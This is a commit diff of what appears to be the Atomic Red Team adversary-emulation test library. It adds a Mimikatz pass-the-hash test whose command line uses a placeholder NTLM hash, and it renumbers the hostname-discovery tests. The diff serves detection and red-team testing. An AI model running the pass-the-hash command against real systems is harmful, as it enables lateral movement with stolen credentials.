Generate docs from job=validate_atomics_generate_docs branch=master

2019-11-25 17:06:20 +00:00
parent 396cdf4d92
commit 0954cf3e57
7 changed files with 100 additions and 18 deletions
@@ -6,12 +6,38 @@ Windows 7 and higher with KB2871997 require valid domain user credentials or RID

 ## Atomic Tests

- [Atomic Test #1 - crackmapexec Pass the Hash](#atomic-test-1---crackmapexec-pass-the-hash)
+- [Atomic Test #1 - Mimikatz Pass the Hash](#atomic-test-1---mimikatz-pass-the-hash)
+
+- [Atomic Test #2 - crackmapexec Pass the Hash](#atomic-test-2---crackmapexec-pass-the-hash)


 <br/>

-## Atomic Test #1 - crackmapexec Pass the Hash
+## Atomic Test #1 - Mimikatz Pass the Hash
+Note: must dump hashes first
+[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| user_name | username | string | Administrator|
+| domain | domain | string | atomic.local|
+| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
+
+#### Run it with `command_prompt`! 
+```
+mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
+```
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - crackmapexec Pass the Hash
 command execute with crackmapexec

 **Supported Platforms:** Windows
@@ -34,9 +34,11 @@ In Azure, the API request <code>GET https://management.azure.com/subscriptions/{

 - [Atomic Test #5 - Linux VM Check via Kernel Modules](#atomic-test-5---linux-vm-check-via-kernel-modules)

- [Atomic Test #6 - Hostname Discovery](#atomic-test-6---hostname-discovery)
+- [Atomic Test #6 - Hostname Discovery (Windows)](#atomic-test-6---hostname-discovery-windows)

- [Atomic Test #7 - Windows MachineGUID Discovery](#atomic-test-7---windows-machineguid-discovery)
+- [Atomic Test #7 - Hostname Discovery](#atomic-test-7---hostname-discovery)
+
+- [Atomic Test #8 - Windows MachineGUID Discovery](#atomic-test-8---windows-machineguid-discovery)


 <br/>
@@ -139,10 +141,26 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
 <br/>
 <br/>

-## Atomic Test #6 - Hostname Discovery
-Identify system hostname for Windows, Linux, and macOS systems.
+## Atomic Test #6 - Hostname Discovery (Windows)
+Identify system hostname for Windows.

-**Supported Platforms:** Windows, Linux, macOS
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`! 
+```
+hostname
+```
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Hostname Discovery
+Identify system hostname for Linux and macOS systems.
+
+**Supported Platforms:** Linux, macOS


 #### Run it with `bash`! 
@@ -155,7 +173,7 @@ hostname
 <br/>
 <br/>

-## Atomic Test #7 - Windows MachineGUID Discovery
+## Atomic Test #8 - Windows MachineGUID Discovery
 Identify the Windows MachineGUID value for a system.

 **Supported Platforms:** Windows
@@ -601,8 +601,9 @@
  - Atomic Test #3: List OS Information [linux, macos]
  - Atomic Test #4: Linux VM Check via Hardware [linux]
  - Atomic Test #5: Linux VM Check via Kernel Modules [linux]
-  - Atomic Test #6: Hostname Discovery [windows, linux, macos]
-  - Atomic Test #7: Windows MachineGUID Discovery [windows]
+  - Atomic Test #6: Hostname Discovery (Windows) [windows]
+  - Atomic Test #7: Hostname Discovery [linux, macos]
+  - Atomic Test #8: Windows MachineGUID Discovery [windows]
 - [T1016 System Network Configuration Discovery](./T1016/T1016.md)
  - Atomic Test #1: System Network Configuration Discovery [windows]
  - Atomic Test #2: List Windows Firewall Rules [windows]
@@ -814,7 +815,8 @@
  - Atomic Test #3: Scheduled Task Startup Script [windows]
  - Atomic Test #4: Logon Scripts - Mac [macos]
 - [T1075 Pass the Hash](./T1075/T1075.md)
-  - Atomic Test #1: crackmapexec Pass the Hash [windows]
+  - Atomic Test #1: Mimikatz Pass the Hash [windows]
+  - Atomic Test #2: crackmapexec Pass the Hash [windows]
 - [T1097 Pass the Ticket](./T1097/T1097.md)
  - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
 - [T1076 Remote Desktop Protocol](./T1076/T1076.md)
@@ -17312,12 +17312,23 @@ discovery:
          sudo lsmod | grep -i "xen-vbd\|xen-vnif"
          sudo lsmod | grep -i "virtio_pci\|virtio_net"
          sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
-    - name: Hostname Discovery
-      description: 'Identify system hostname for Windows, Linux, and macOS systems.
+    - name: Hostname Discovery (Windows)
+      description: 'Identify system hostname for Windows.

 '
      supported_platforms:
      - windows
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'hostname
+
+'
+    - name: Hostname Discovery
+      description: 'Identify system hostname for Linux and macOS systems.
+
+'
+      supported_platforms:
      - linux
      - macos
      executor:
@@ -23303,6 +23314,30 @@ lateral-movement:
      modified: '2019-07-18T16:56:39.990Z'
      identifier: T1075
    atomic_tests:
+    - name: Mimikatz Pass the Hash
+      description: |
+        Note: must dump hashes first
+        [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
+      supported_platforms:
+      - windows
+      input_arguments:
+        user_name:
+          description: username
+          type: string
+          default: Administrator
+        domain:
+          description: domain
+          type: string
+          default: atomic.local
+        ntlm:
+          description: ntlm hash
+          type: string
+          default: cc36cf7a8514893efccd3324464tkg1a
+      executor:
+        name: command_prompt
+        command: 'mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
+
+'
    - name: crackmapexec Pass the Hash
      description: 'command execute with crackmapexec

@@ -102,7 +102,7 @@
  - Atomic Test #3: List OS Information [linux, macos]
  - Atomic Test #4: Linux VM Check via Hardware [linux]
  - Atomic Test #5: Linux VM Check via Kernel Modules [linux]
-  - Atomic Test #6: Hostname Discovery [windows, linux, macos]
+  - Atomic Test #7: Hostname Discovery [linux, macos]
 - [T1016 System Network Configuration Discovery](./T1016/T1016.md)
  - Atomic Test #3: System Network Configuration Discovery [macos, linux]
 - [T1049 System Network Connections Discovery](./T1049/T1049.md)
@@ -114,7 +114,7 @@
 - [T1082 System Information Discovery](./T1082/T1082.md)
  - Atomic Test #2: System Information Discovery [linux, macos]
  - Atomic Test #3: List OS Information [linux, macos]
-  - Atomic Test #6: Hostname Discovery [windows, linux, macos]
+  - Atomic Test #7: Hostname Discovery [linux, macos]
 - [T1016 System Network Configuration Discovery](./T1016/T1016.md)
  - Atomic Test #3: System Network Configuration Discovery [macos, linux]
 - [T1049 System Network Connections Discovery](./T1049/T1049.md)
@@ -422,8 +422,8 @@
  - Atomic Test #1: Find and Display Iinternet Explorer Browser Version [windows]
 - [T1082 System Information Discovery](./T1082/T1082.md)
  - Atomic Test #1: System Information Discovery [windows]
-  - Atomic Test #6: Hostname Discovery [windows, linux, macos]
-  - Atomic Test #7: Windows MachineGUID Discovery [windows]
+  - Atomic Test #6: Hostname Discovery (Windows) [windows]
+  - Atomic Test #8: Windows MachineGUID Discovery [windows]
 - [T1016 System Network Configuration Discovery](./T1016/T1016.md)
  - Atomic Test #1: System Network Configuration Discovery [windows]
  - Atomic Test #2: List Windows Firewall Rules [windows]
@@ -496,7 +496,8 @@
  - Atomic Test #2: Starup Folder Script [windows]
  - Atomic Test #3: Scheduled Task Startup Script [windows]
 - [T1075 Pass the Hash](./T1075/T1075.md)
-  - Atomic Test #1: crackmapexec Pass the Hash [windows]
+  - Atomic Test #1: Mimikatz Pass the Hash [windows]
+  - Atomic Test #2: crackmapexec Pass the Hash [windows]
 - [T1097 Pass the Ticket](./T1097/T1097.md)
  - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
 - [T1076 Remote Desktop Protocol](./T1076/T1076.md)